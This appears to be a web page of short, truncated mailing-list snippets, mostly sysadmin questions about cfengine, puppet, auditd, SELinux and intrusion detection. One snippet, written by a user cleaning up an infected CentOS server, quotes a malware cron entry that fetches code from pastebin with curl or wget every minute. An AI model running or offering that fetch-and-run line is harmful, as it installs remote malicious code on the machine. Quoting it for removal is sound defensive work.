similar to: Some basic SELinux questions

Hello all, I have been exploring the various intrusion detection systems available for the Linux platform and was wondering what ones you all would recommend? I have used AIDE before and while it is extremely easy to setup, it does not support the ability to send alerts as files are changed (allows one to be aware of an intrusion almost immediately). Thank you, Dan Burkland ?

Greetings: i have an x86_64 Centos5.3 box and i'm trying to run auditd. it fails on startup and this is the O/P at the end: config_manager init complete Error setting audit daemon pid (Connection refused) type=DAEMON_ABORT msg=audit(1260554376.697:5674): auditd error halt, auid=4294967295 pid=32702 res=failed Unable to set audit pid, exiting The audit daemon is exiting. Error setting

Hey folks, I have a problem with the definition of a variable of type slist in CFEngine on # uname -a ; cat /etc/redhat-release Linux policyhub.example.com 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux CentOS Linux release 7.4.1708 (Core) I'm not sure if its valid to ask CFEngine questions on this mailing list, but as far as I'm running on

hi, i use libvirt 1.0.2 (-r1 , gentoo linux). when i create a vm with win7 guest, virtio nic, virtio hdd, all is running fine. but when i shutdown the windows guest, it takes somestimes 20-34 minutes !!! iotop shows me in the whole time writing with 2,xxmb/sec. is the complete machine "rewritten" to disk? i use disk.images on a raid6, but hey, dd shows me it can writes there with

How do you know when a Linux system has been compromised?? Every day I watch our systems with all the typical tools, ps, top, who, I watch firewall / IPS logs, I have logwatch setup and mailing daily summaries to me and I dive deeper into logs if something looks suspicious. What am I missing or not looking at that you security gurus are looking at? I subscribe to the centos and SANS

I wish place the following axis label in such a manner that some of the text is plain and the scientific name is in italics (i.e. a mixture of two font types) Using plot: mtext("Total Landings of Pecten maximus (tonnes)",font,=3, side=2, line=3) makes everything italic, but how do I apply the font change to only "Pecten maximus"? Rgds Phil

Greetings, Our environment consists of about 600 Redhat Enterprise Linux 3, 4, 5, and soon 6 servers. We use cfengine 2 currently, but plan on migrating to puppet. Right now, we have our root-owned cfengine client running every 15 minutes from cron contacting a single cfservd server. Additionally, our employees start their own cfengine and puppet instances on on some servers running under

Is there an equivalent to cfrun in puppet. On the cfengine master you can do the command cfrun <hostname> which allows you to tell the cfengine client to run. This is useful for immediately pushing changes out immediately (or telling the client to pull). Chris

Anyone ever implimented cfengine on 4.x ? I am just looking for background and if there are any traps to fall into? thanks

> On 26 Jul 2017, at 7:57 pm, Olaf Hopp <Olaf.Hopp at kit.edu> wrote: > > Dear collegues, > > many thanks for your valuable input. > > Since we are an university GEO-IP blocking is not an option for us. > Somestimes I think it should ;-) > > My "mistake" was that I had just *one* fail2ban filter for both cases: > "wrong password" and

Hello, I''ve recently begun looking at Puppet as an alternative to Cfengine and I have a couple of questions. 1) Besides the information posted on the Puppet website, are there any critical differences between Puppet and Cfengine? 2) Does Puppet allow for client-specific file text manipulation. For instance, in Cfengine I can add a line of text to a file if the line doesn''t

The docs to installing cfengine refers to /var/spool/cron/crontabs/root That doesn't exist. Nor does /etc/crontab. Heck I remember that from the "old days", now there are lots of cron entries, in /etc but no crontab. Not installed by default. So, I'm hunting that one down. Nate, what did you wind up doing?? Ric -- ---------------------------------------------------- My father,

I know this is a basically meaningless milestone, but for some reason it means something to me. For the first time (as far as I know), #puppet on irc.freenode.net has more users than #cfengine: 21 vs. 19. Admittedly, that''s a low user count for #cfengine, but I''ll take it. :) -- Honest criticism is hard to take, particularly from a relative, a friend, an acquaintance, or

What is your environment set up for? Is this just straight out of the box, or have you harden the systems any? -----Original Message----- From: centos-bounces at centos.org [mailto:centos-bounces at centos.org] On Behalf Of Earl A Ramirez Sent: Friday, May 29, 2015 10:53 AM To: CentOS mailing list Subject: Re: [CentOS] CentOS 7 selinux policy bug On 29 May 2015 at 16:27, <m.roth at

Hello, we run approximately 400 Centos servers at our company. We use cfengine for configuration management. I am looking for some documentation to do patching including kernel patches. I was thinking of just having each host run yum update via cfengine but not sure if there are any gotchas there? Should I just do yum update? or should i exclude the kernel and be more careful with those? how

I need to know how to do the following in puppet. Say I have three classes, (c1,c2,c3) that are not related. These classes could be considered "attributes" that may or may not apply to an individual host on my network. I need to know how to write a manifest, or series of manifests to allow me trigger a command (call it ''foo'') if all three classes are defined. I also

Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently i am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps and is done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget

I have been looking at Puppet as a possible replacement for cfengine at our site. One difficulty I''ve had with cfengine that I''m wondering if Puppet can solve is that of dealing with laptop/mobile users. Since these laptops move around quite a bit, their IP/hostname is constantly changing. From playing with puppet a bit, I''ve found that it seems to generate the

Hello All, I have been tasked with getting some configuration management system running at work. We have about 20 web servers running (some virtual and some physical), and we are trying to come up with a tool that will assist setting up new boxes as we bring them online, as well as maintaining existing systems when changes are necessary. After spending a little bit of time searching around

Is anyone working with cfengine v3? It looks like it has some interesting design changes and a commercially supported windows version now. Can anyone share real-world experiences? -- Les Mikesell lesmikesell at gmail.com